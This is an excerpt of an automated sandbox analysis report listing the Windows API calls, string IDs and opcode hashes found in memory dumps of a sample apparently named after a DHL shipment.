                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 1352324309-0
                                                                                      • Opcode ID: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                      • Instruction ID: 9c5d31441ef7851624e00bd2014e538c4c7f9858a060c3292139efcfb185ecbe
                                                                                      • Opcode Fuzzy Hash: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                      • Instruction Fuzzy Hash: 2C118BB2215310ABFB308F14DC08F967BFCEB00B00F108569EA1ED6192D7B4E904EBA0
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0C4
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0E9
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0F3
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                      • String ID:
                                                                                      • API String ID: 2875609808-0
                                                                                      • Opcode ID: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                      • Instruction ID: e1c38ae4d654d7f73c6dc24b882f6e652acdde96b7718d62ce4d0d0e1b676581
                                                                                      • Opcode Fuzzy Hash: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                      • Instruction Fuzzy Hash: A011AD70C0062CE7EF10AFE5EA68AEEBF78FF4A321F014095D951B2181CB348A50DB91
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C7E33
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E4B
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E6F
                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C7E8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 357397906-0
                                                                                      • Opcode ID: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                      • Instruction ID: f46e47f550538d1c494ccc3a90d7283514815051053d504c7f4693f3f1d35587
                                                                                      • Opcode Fuzzy Hash: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                      • Instruction Fuzzy Hash: E51143B9D0420AAFEB41CF98C984EEEBBF5FB08310F505156E915E2210D735AA55CF50
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2710830443-0
                                                                                      • Opcode ID: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                      • Instruction ID: d60a6e998a48b001cca3257550be6f3a0831b39b78bd92ee7e69180781427880
                                                                                      • Opcode Fuzzy Hash: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                      • Instruction Fuzzy Hash: 2BE092715022247BFB201B73DC0DFEB3E6CEF43BA5F010015F50AD10809AA8C841D6B0
                                                                                      APIs
                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 000C8887
                                                                                      • LineTo.GDI32(?,?,?), ref: 000C8894
                                                                                      • EndPath.GDI32(?), ref: 000C88A4
                                                                                      • StrokePath.GDI32(?), ref: 000C88B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 000498CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 000498D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000498E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 000498F1
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00091634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000911D9), ref: 00091648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009164F
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0008D858
                                                                                      • GetDC.USER32(00000000), ref: 0008D862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0008D86C
                                                                                      • GetDC.USER32(00000000), ref: 0008D876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      APIs
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000A4ED4
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Connection_wcslen
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1725874428-3443410124
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0005E30D
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 0004F2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0004F2BB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000B57E0
                                                                                      • _wcslen.LIBCMT ref: 000B57EC
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                      • String ID: CALLARGARRAY
                                                                                      • API String ID: 157775604-1150593374
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000AD130
                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000AD13A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CrackInternet_wcslen
                                                                                      • String ID: |
                                                                                      • API String ID: 596671847-2343686810
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 000C3621
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000C365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                                                                      • Instruction ID: 83b8ac3532a5aeb1a8681e877b2491e899eb91538e3007cb62ea7d52bc67b449
                                                                                      • Opcode Fuzzy Hash: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                                                                      • Instruction Fuzzy Hash: D8318C71110604AAEB149F68DC81FFF73A9FF88720F00D61DF9A997291DA35AD81DB60
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • GetParent.USER32(?), ref: 000873A3
                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0008742D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$ParentProc
                                                                                      • String ID: p]
                                                                                      • API String ID: 2181805148-1923361398
                                                                                      • Opcode ID: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                                                                      • Instruction ID: 2eeb162618782e77c11e5e41203b6fb16e383eba80f6558e9bbc291a14ecc6af
                                                                                      • Opcode Fuzzy Hash: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                                                                      • Instruction Fuzzy Hash: 3421D070604104AFCB21AF2CC848DEA3BD1EF46364F1402B9F9A95B2A2C7718E51E744
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000C327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C3287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                      • Instruction ID: a85c1a73ac304b909e9760f2f58543f69bfc76a09c1a887cb7401dc2f09577ae
                                                                                      • Opcode Fuzzy Hash: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                      • Instruction Fuzzy Hash: 7111D0712102087FFF659F54DC81FBF37AEEB98364F108129F91897290D6719D518760
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: HANDLE$`
                                                                                      • API String ID: 176396367-1948523916
                                                                                      • Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                                      • Instruction ID: 6a380fd4a750b9a5bdd07a3cbe4e96faea266bbeee26e5066762e655413e1451
                                                                                      • Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                                      • Instruction Fuzzy Hash: 30110072520198DAEF28CF14D899BBDB3E8EF80766F60407BE405CE0C4FB709E81A614
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMenuPopup
                                                                                      • String ID: p]
                                                                                      • API String ID: 3826294624-1923361398
                                                                                      • Opcode ID: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                                                                      • Instruction ID: 6330cffe8169eb9095d17e2bb161f137228bc40f7e87cd2def70bc925b12d767
                                                                                      • Opcode Fuzzy Hash: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                                                                      • Instruction Fuzzy Hash: CB214834608604AFDB61CF28C445FDABBE5FB0A365F08806EE8999B351D331AE42CF51
                                                                                      APIs
                                                                                        • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                        • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                                                                        • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C377A
                                                                                      • GetSysColor.USER32(00000012), ref: 000C3794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                      • Instruction ID: 0296f7399c0d75493d78f497b1b87ac7fbf57e18e6f41e88972dea700155053f
                                                                                      • Opcode Fuzzy Hash: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                      • Instruction Fuzzy Hash: CA1129B2610209AFEB11DFA8CC46EEE7BF8FB08314F008619F955E2250D775E9519B50
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C61FC
                                                                                      • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 000C6225
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3850602802-1923361398
                                                                                      • Opcode ID: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                                                                      • Instruction ID: fd7376cd5fe5e6e7a5f0d4eaaef27780c3a86488c11cc761abddb0caf715f126
                                                                                      • Opcode Fuzzy Hash: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                                                                      • Instruction Fuzzy Hash: 8611C471144614BEEB318F68CD15FFD3BE8EB06315F044119FA169A1E1D3B6DA00DB50
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ACD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ACDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                      • Instruction ID: edfb406784d3fe2f34ed96261c8450776eb7f4704b909bee274fd1c073034463
                                                                                      • Opcode Fuzzy Hash: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                      • Instruction Fuzzy Hash: 0911CE71205636BAF7784BA68C89EF7BEACEF137A4F01422AB11987180D7749840D6F0
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 000C34AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000C34BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                      • Instruction ID: 4f606b4f0fcfeba1c65d37d6421f22c3a8b3ee7adb547bda80beec2eae3dd946
                                                                                      • Opcode Fuzzy Hash: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                      • Instruction Fuzzy Hash: B211BC71110208ABEB668F64DC84FEF37AAEB05374F508328FA64931E0C775EC919B60
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,?,?,?), ref: 000C4FCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3850602802-1923361398
                                                                                      • Opcode ID: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                                                                      • Instruction ID: 9eacc7426c48c3d5374c6fcffae2aac19cd1d32d238c22ef1b4fcc6dd2bf649c
                                                                                      • Opcode Fuzzy Hash: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                                                                      • Instruction Fuzzy Hash: 4C21D07AA0011AEFDB15CFA8C950DEE7BB9FB4D340B104158FA05A7320D731E961EBA0
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00096CB6
                                                                                      • _wcslen.LIBCMT ref: 00096CC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: STOP
                                                                                      • API String ID: 1256254125-2411985666
                                                                                      • Opcode ID: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                                                                      • Instruction ID: 3b27576b14f78e0f7ea44391f1608fb3c9943448e4be2b3b7cbb4f61e83f0724
                                                                                      • Opcode Fuzzy Hash: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                                                                      • Instruction Fuzzy Hash: 5701C032A145268ACF21AFBDDC819BF77E9EB61710B510538F86296191EA32E940E650
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]
                                                                                      • API String ID: 0-1923361398
                                                                                      • Opcode ID: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                                                                      • Instruction ID: e946a91079054f5af61beaba6b22d80042b687e9fded2fddffe453071d984062
